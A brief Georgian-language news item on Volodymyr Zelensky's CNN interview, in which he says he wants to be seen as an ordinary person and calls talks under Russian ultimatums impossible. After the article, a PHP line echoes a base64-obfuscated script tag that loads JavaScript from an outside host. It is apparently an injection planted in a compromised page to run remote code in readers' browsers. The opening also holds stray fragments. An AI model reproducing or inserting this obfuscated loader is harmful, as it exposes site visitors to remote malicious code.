celsiusi
ავერსი შნაიდერი
მინდა, ხალხმა ისეთად მიმიღოს, როგორიც ვარ, ჩვეულებრივ ადამიანად, - ამის შესახებ უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ CNN-თან ინტერვიუში განაცხადა.
 
ჟურნალისტის კითხვაზე, თუ როგორ ისურვებდა დაემახსოვრებინათ, ზელენსკიმ უპასუხა:
 
”ადამიანად, რომელსაც სიცოცხლე ბოლომდე უყვარდა და ასევე უყვარდა ოჯახი და სამშობლო. გმირად ნამდვილად არა - მინდა ხალხმა ისეთად მიმიღოს, როგორიც ვარ, ჩვეულებრივ ადამიანად“.
 
ინტერვიუში უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ განაცხადა, რომ ომის დასასრულებლად რუსეთთან დიპლომატიური ურთიერთობისთვის მზად არის, თუმცა უკრაინელ ხალხზე რუსეთის თავდასხმები ამ პროცესს აფერხებს.
 
"როგორც ადრე ვთქვი, რა არის ამ ყველაფრის ფასი? ეს არის ხალხი - უამრავი ადამიანი, რომელიც დაიღუპა. საბოლოოდ ვის უწევს ამ საფასურის გადახდა? - უკრაინას, მხოლოდ ჩვენ. ჩვენთვის ეს ნამდვილად დიდი ფასია. თუ საუბრის შესაძლებლობა გვექნება, აუცილებლად ვისაუბრებთ, მაგრამ საუბარი რუსული ულტიმატუმის პირობებში? ეს შეუძლებელია“, - დასძინა ზელენსკიმ.
846
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");